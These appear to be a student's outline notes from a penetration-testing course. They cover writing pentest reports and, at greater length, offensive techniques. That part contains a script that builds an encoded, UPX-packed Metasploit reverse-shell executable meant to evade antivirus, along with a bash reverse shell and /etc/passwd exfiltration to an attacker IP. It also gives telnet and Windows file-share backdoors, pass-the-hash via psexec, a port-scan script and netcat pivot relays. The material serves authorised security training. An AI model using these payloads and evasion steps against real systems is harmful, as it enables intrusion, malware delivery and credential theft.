- 561
- 561: Maximizing the effectiveness of Reports, Exploits, and Command Shells
- Intro
- in 560, everything works
- in 561, more experimental
- new to the Metasploit framework
- may not work 100%
- report writing workshop
- Reports
- exec summary
- systematic failure
- patch process failing?
- systems not following build procedures?
- focus on business aspects
- how to remedy with mgt action?
- enough detail to support mgt decisions
- context of risk, not technology
- contents
- a little about scope
- narrative
- how measured
- findings
- why important?
- what is the risk?
- each finding is an argument for action
- description of tool or setting, "not needed for business purposes", why risky, recommendation
- solution at end
- self-contained
- detail section
- SOYA
- spell out your acronyms
- otherwise you sound sarcastic
- or as if you are talking over the audience's heads
- first use in each section should be spelled out because the report may be sliced up
- assume the audience is technical, but not pentesters themselves
- balance between too technical and too basic
- problem: criticize example report
- exec summary
- using tech terms
- subnets: what does that mean in relation to the scope?
- says nothing of systematic issues. All solutions are point solutions
- "focused on servers and their related systems"
- no narrative about how PII was accessed
- sounds cranky, no positive recommendations
- what efforts are successful and should be continued
- how pervasive were the flaws found? what do the existence of the flaws indicate systemically?
- no indication of which one is most serious
- missing
- 1. restrict services to those that serve a business purpose
- 2. improve patching process
- introduction
- fuzzy definition of subnets tested
- how were internal networks tested via Internet
- turns out to be an artifact of the class avoiding the 837-5309 problem
- scope and dates should have been separate section
- DoS mentioned twice. Why?
- Second time, tester is complaining about a test not being allowed.
- methodology
- all general statements, not anything about what was done
- no mention of what tools were used
- how can we retest in the same manner to confirm remediation was successful?
- no mention of techniques, just tools
- harping on DoS tests not being performed again
- findings
- high, med, low risk is only measure
- no mention of what tools were used
- how hard to fix?
- how much does each finding impact the business? That is the correct measure of risk.
- each risk category should be its own section
- 4.1.1
- what is GUI? what is VNC?
- summary does not say what the problem is
- did they exploit VNC, or just find it listening?
- if it had been exploited, what could an attacker have done?
- keep going, access other systems,etc.
- 4.1.2
- 4.1.3
- Apply Windows Patch
- cut and paste info
- 4.2.1
- got some access, could not get further, hence only "medium"
- should have been "high" because someone with more time could have gotten in
- no mention that patching process is failure
- 4.2.2
- what is an "excessive port"?
- recommend
- write to target audience
- convey a message that has a real impact
- hire a tech writer
- better reports trump better technical prowess
- Metasploit
- Title: Building, encoding, and Using Metasploit payloads
- goals
- steps
- 1. build evil exe
- msfpayload
- takes a payload and makes one of:
- X - standalone exe
- C - C code
- P - Perl
- J - .js to download and execute
- R - generate raw bytes
- vbscript (for office macros)
- Office doc compromises a machine as soon as opened
- ./msfpayload windows/shell_reverse_tcp LPORT=3333.... X > filename.exe
- Check the length. If under 100 bytes, probably did not work
- Choice of port affects detection by AV engines.
- 55555, 66666, etc. more detectable
- try at virustotal
- as soon as executed
- reverse shell (to our nc listener)
- but may crash
- 1 in 10 Windows systems more likely to crash
- Why reverse shell?
- more likely to be allowed outbound by firewall than inbound bind_tcp shell
- use a port like 80 or 443
- phones home, no need for attacker to know the victim IP
- Any Metasploit payload?
- fancier payloads tend to be buggy
- shell is enough anyway
- shell_bind_tcp
- shell_reverse_tcp
- darkoperator (Carlos Perez)
- most AV only look at first 150 bytes
- padding helps avoid AV detection
- 2. encode evil exe
- msfencode
- encode the payload
- many IDS detect payload, not exploit
- see slide 14
- show encoders
- set ENCODER [type]
- ./msfencode -l -a x86
- to list possibilities
- -a [processor]
- x86
- x86/shikata_ga_nai
- name is Japanese for "it cannot be helped": at the end of WW2 we thought the Japanese would fight to the end
- but the Japanese populace decided "we've lost, there's nothing more that can be done"
- output
- mark baggett
- articles, modify Ruby code to make encoding more stable
- see his blog
- search: mark baggett metasploit
- 3 rounds of encoding, and still runs
- slide 17 ff. has the steps to encode
- encoded payload can be reused in msf
- 3. further alter exe
- upx packer
- easier way to dodge detection
- also used by legitimate developers to protect their intellectual property
- some AV detect, some do not
- can pack an .exe
- can even pack a .dll
- instructor's favorite compression levels: -2, -7
- upx.exe --force -o exename.exe inputexe.exe
- --force because UPX is whiny and refuses "suspicious" executables by default
- 4. weaponize exe
- universal customizer and USB token
- exercise: create attack USB thumbdrive
- start slide 33
- also create an attack ipod touch: more likely for exec to hook it up
- must be a U3 device
- behave like a CDROM
- can field strip, put in a non-U3 device case (!)
- policy
- will never insert a U3 device
- install universalcustomizer
- creates U3custom.iso in its BIN folder
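Steps 1 to 3 above as one script, an added example that is not from the course slides or from the Metasploit project. It assumes the legacy Metasploit 3.x tools msfpayload and msfencode (both later folded into msfvenom) and upx are on the PATH; LHOST, LPORT, the three encoder rounds from the note above, and the file names are illustration values. The only part that runs without those tools is the length check from step 1 (an .exe under 100 bytes almost certainly did not build).

```shell
#!/bin/sh
# Added example, not from the course slides: steps 1-3 (build, encode,
# pack) in one script. Assumes the legacy msfpayload/msfencode (Metasploit
# 3.x; msfvenom replaced both later) and upx are on the PATH. LHOST, LPORT,
# round count and file names are illustration values.

# Step 1 sanity check: an .exe under 100 bytes almost certainly means the
# build failed (bad option, unknown payload) and only an error message went
# to the file. Returns 0 when the file exists and is at least 100 bytes.
check_payload_size() {
    f=$1
    [ -f "$f" ] || return 1
    size=$(wc -c < "$f" | tr -d ' ')
    [ "$size" -ge 100 ]
}

# Steps 1+2: emit the raw payload bytes (R) and pipe them through N rounds
# of x86/shikata_ga_nai, writing a Windows PE (-t exe). Piping the raw
# bytes avoids the intermediate file the slides build by hand.
build_encoded_exe() {
    lhost=$1; lport=$2; rounds=$3; out=$4
    msfpayload windows/shell_reverse_tcp LHOST="$lhost" LPORT="$lport" R \
        | msfencode -e x86/shikata_ga_nai -c "$rounds" -t exe -o "$out"
}

# Step 3: UPX-pack the result. --force is needed because UPX refuses
# "suspicious" PEs by default; -o keeps the unpacked copy for comparison.
pack_exe() {
    in=$1; out=$2
    upx --force -o "$out" "$in"
}

# Usage: ./build_evil.sh 10.10.10.1 443 3 evil.exe
# (443 rather than 55555: see the note above on port choice and AV.)
if [ "$#" -eq 4 ]; then
    lhost=$1; lport=$2; rounds=$3; out=$4
    for tool in msfpayload msfencode upx; do
        command -v "$tool" >/dev/null 2>&1 || { echo "missing: $tool" >&2; exit 1; }
    done
    build_encoded_exe "$lhost" "$lport" "$rounds" "$out"
    check_payload_size "$out" || { echo "$out is too small, build failed" >&2; exit 1; }
    pack_exe "$out" "packed-$out"
    ls -l "$out" "packed-$out"
fi
```

Run the size check on both the encoded and the packed file; a packer error also leaves a tiny or empty output behind.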
- search
- pivot
- psexec
- pass-the-hash
- Post-exploitation without netcat
- netcat is not always installed or available
- What do you do?
- Mike Poor: easy, get nc and put it there
- Uses for netcat
- connect to arbitrary open ports
- scan ports
- wrap the above in scripts
- send files
- implement backdoor shell
- build relays
- more
- versions
- original by Hobbit
- socat
- cryptcat
- linkcat
- Dan Kaminsky
- arbitrary frame injection
- nc.py
- perlcal
- by Atlas
- currently still a work in progress
- IOScat
- Why not just netcat?
- not installed
- Rules of Engagement prohibit installation of tools
- HIPS prevents it
- AV tools blocking nc
- maybe we don't even need it
- best practices
- install no tools, use built-in
- if it crashes the system, no flak
- not detected by AV
- safer
- goals
- backdoor shell
- file transfer
- port scanner
- our parameters
- Focus on TCP not UDP
- easier
- more built in tools
- Use arbitrary ports
- Linux first
- Linux
- /dev/tcp
- don't need root to use it
- /dev/tcp/[ip]/[port]
- not on Debian distros
- no /dev/tcp: it is a bash feature (net redirections), not a kernel device file, and Debian's bash was built without it
- only Fedora, Red Hat bash builds have it
- file xfer
- cat /etc/passwd > /dev/tcp/1.2.3.4/333
- catch with nc listener
- command line backdoor
- /dev/tcp
- /bin/bash -i > /dev/tcp/[ip]/[port] 0<&1 2>&1
- ampersands before the 1s because 0<&1 and 2>&1 duplicate a file descriptor; without the & bash would open a file named "1"
- also can redir into sclient and send to remote SSH listeneer
- "reverse telnet"
- if debian, for instance
- 2 outgoing telnets!
- victim$ telnet [attackerIP] [port1] | /bin/bash | telnet [attackerIP] [port2]
- attacker$ nc -l -p 2222 (port1: type commands here)
- attacker$ nc -l -p 3333 (port2: output arrives here)
- portscan
- /dev/tcp
- echo > /dev/tcp/[IP]/[port]
- see if "connection refused". If so, port is closed
- If port open, no error
- because Linux systems don't brag
- exit status = 0
- port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IP]/$port 2>/dev/null;
[ $? == 0 ] && echo "$port is open" >> /tmp/ports.txt; port=$(expr $port + 1); done
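The /dev/tcp scan loop above, rewritten as an added example (not from the course notes) with the two things the one-liner lacks: a timeout, because a firewall that silently drops packets leaves a bare /dev/tcp open hanging instead of returning "connection refused", and a clean per-port exit status that a caller can test. /dev/tcp is a bash feature, so each probe is run through bash explicitly; that also makes the script work when it is executed by plain sh. Host, port range and the 2-second timeout are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not from the course notes: /dev/tcp port scan with a
# timeout and a usable exit status. Requires bash on the box (for /dev/tcp);
# uses coreutils timeout when present so filtered ports do not hang.

# Returns 0 if host:port completes a TCP handshake, non-zero if the
# connection is refused, unreachable or times out. "exec 3<>" opens the
# socket on fd 3 without sending anything; fd 3 is closed when the bash
# child exits, so the connection is torn down immediately.
port_open() {
    host=$1; port=$2
    if command -v timeout >/dev/null 2>&1; then
        timeout 2 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    else
        bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    fi
}

# Prints open ports, one per line (the notes' loop appended these to
# /tmp/ports.txt). Range is inclusive on both ends.
scan_range() {
    host=$1; first=$2; last=$3
    p=$first
    while [ "$p" -le "$last" ]; do
        if port_open "$host" "$p"; then
            echo "$p"
        fi
        p=$((p + 1))
    done
}

# Usage: ./devtcp-scan.sh 10.10.10.20 1 1023
if [ "$#" -eq 3 ]; then
    scan_range "$1" "$2" "$3"
fi
```

The original loop's `echo > /dev/tcp/...` also writes a newline to every open service; `exec 3<>` connects without sending a byte, which matters when a banner-logging daemon is on the other end.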
- telnet
- Windows
- building blocks
- for /L %i in (start,step,stop) do [command]
- a counter; stop is inclusive
- with step 0, e.g. (1,0,2), %i never reaches stop, so the loop runs forever (used for the backdoor below)
- telnet
- hideous
- hangs on an open port
- no errorlevel
- no logging
- not installed on Vista (by default)
- pkgmgr /iu:"TelnetClient"
- or install telnet server with /uu instead of /iu
- ftp
- open [ip] [port]
- ftp can read from a response file with -s
- portscanner
- for /L %i in (1,1,1024) do echo open [IP] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
- hangs for 15 seconds on open port, then moves on
- actually, good: this is stealthy and may fool IDS
- does not store results
- ugly workround to store results: see slide 29
- file xfer
- type file >> \\machine\share\filename
- Use net use session to mount remote drive if credentials needed
- use copy or move also
- echo hello >> \\1.2.3.4\temp\file.txt
- command shell
- the "file shell" backdoor
- "for" command with '^' as delimiter
- see slide
- it loops every second; if no commands.txt it loops again
- ping command to slow it down
- feed it commands to write to commands.txt
- read results by using type to read output.txt
- Samba works great for the two above functions
- other ways
- use FTP to transfer files back and forth
- retrieve command as PTR record, etc.
- then return result as an A record lookup
- exercise slide 36
- note: NTLMv1 must be enabled on Windows for Samba to work
- Additional Metasploit features
- additional handout, page numbering starts with 4-1
- often the system we are trying to access is not the one we just exploited, but one a few hops away
- Metasploit 3.1 search command
- all
- specific service
- payloads
- exploits
- Route command
- compromising a system
- pretend that we are at victim1
- set RHOST victim2
- exploit
- now msf will automatically launch the exploit from victim1
- exploit victim1
- use exploit
- set PAYLOAD, LPORT
- set RHOST victim1IP
- exploit
- ctrl-Z to background the meterpreter session
- exploit victim2 via victim1
- route add victim2subnet netmask session#
- route print
- set RHOST victim2IP
- exploit
- traffic goes from victim1 to victim2
- psexec to launch
- as if on victim1 (again)
- see slide 4-7
- but we don't have admin necessarily
- integrated pass-the-hash
- do meterpreter's hashdump on victim1
- use windows/smb/psexec
- set SMBPass adminLMhash:adminNThash
- set SMBUser Administrator
- exploit
- slide 4-8
- problem: psexec is multithreaded, meterpreter is not
- so only stable for 30 seconds
- exercise slide 4-10
- exploit 10.10.10.10
- meterpreter as payload
- route command for 10.10.10.20
- pivot to 10.10.10.20
- tcpdump on 10.10.10.20 would only show traffic from 10.10.10.10; none from you!
- Flexible Linux pivots
- metasploit route might crash too much
- very common:
- compromise system on DMZ
- get shell on that system
- use netcat relay
- firewall blocks port 445 dst on DMZ
- netcat gender bender relay
- start from our Windows system
- cannot attack DMZ Windows using fgdump through the firewall
- our Linux system
- our system, listen on 445, nc to port 80 on DMZ victim1
- mknod backpipe1 p
- nc -nvlp 445 0<backpipe1 | nc -nvlp 80 | tee backpipe1
- or
- nc -nvlp 445 0<backpipe1 | nc -nvlp 80 > backpipe1
- DMZ Linux system
- mknod backpipe2 p
- connect to DMZ Windows system on 445
- nc -nv DMZ-W 445 0<backpipe2 | nc -nv ourLinux 80 | tee backpipe2
- or
- nc -nv DMZ-W 445 0<backpipe2 | nc -nv ourLinux 80 > backpipe2
- Quickly!
- run fgdump through our system through DMZ L to DMZ W
- or net use
- net use * \\ourLinux\c$ password /u:Administrator
- must be done fast, as once DMZ-L connects to DMZ-W on 445, DMZ_W will not wait long for an SMB connection.
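The two relays above as one script, an added example that is not from the course notes. It adds the details the one-liners leave out: the FIFO has to be created as a named pipe (`mknod NAME p`, or `mkfifo`), it should be removed when the relay dies, and the two relays must be started in the right order. Host names (ourLinux, DMZ-W) and ports (445, 80) are the ones used in the notes; the flags assume a traditional nc that accepts `-l -p PORT` (Hobbit nc or GNU netcat; OpenBSD nc takes `-l PORT` instead).

```shell
#!/bin/sh
# Added example, not from the course notes: the gender-bender
# (listen-listen) and client-client netcat relays as one script.
# Hosts/ports below are the ones from the notes.

# Print the relay pipeline for a mode. The FIFO carries the return path:
# the right-hand nc writes into it, the left-hand nc reads from it.
#   listen-listen  PORT_A PORT_B              (gender bender, run on ourLinux)
#   client-client  HOST_A PORT_A HOST_B PORT_B (run on DMZ-L)
relay_cmd() {
    mode=$1; fifo=$2
    case "$mode" in
        listen-listen)
            [ "$#" -eq 4 ] || return 2
            echo "nc -nvlp $3 0<$fifo | nc -nvlp $4 1>$fifo" ;;
        client-client)
            [ "$#" -eq 6 ] || return 2
            echo "nc -nv $3 $4 0<$fifo | nc -nv $5 $6 1>$fifo" ;;
        *)
            return 2 ;;
    esac
}

# Create the named pipe (mknod NAME p, as in the notes, or mkfifo), run
# the relay, and remove the pipe when nc exits or we are interrupted.
run_relay() {
    mode=$1; shift
    fifo=$(mktemp -u /tmp/backpipe.XXXXXX)
    mkfifo "$fifo" || return 1
    trap 'rm -f "$fifo"' EXIT INT TERM
    cmd=$(relay_cmd "$mode" "$fifo" "$@") || {
        echo "usage: $0 listen-listen PORT_A PORT_B | client-client HOST_A PORT_A HOST_B PORT_B" >&2
        return 2
    }
    echo "+ $cmd" >&2
    sh -c "$cmd"
}

# Order matters for the SMB relay in the notes:
#   1. ourLinux:   ./relay.sh listen-listen 445 80
#   2. DMZ-L:      ./relay.sh client-client DMZ-W 445 ourLinux 80
#   3. ourWindows, immediately:
#        net use * \\ourLinux\c$ password /u:Administrator
# Step 2 opens the connection to DMZ-W:445 before any SMB bytes exist,
# and DMZ-W drops an idle SMB connection quickly, hence "Quickly!".
case "${1:-}" in
    listen-listen|client-client) run_relay "$@" ;;
esac
```

The `| tee backpipe` variant in the notes does the same job but also echoes the return-path bytes to the terminal, which is handy for seeing whether anything is flowing back from DMZ-W.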
- exercise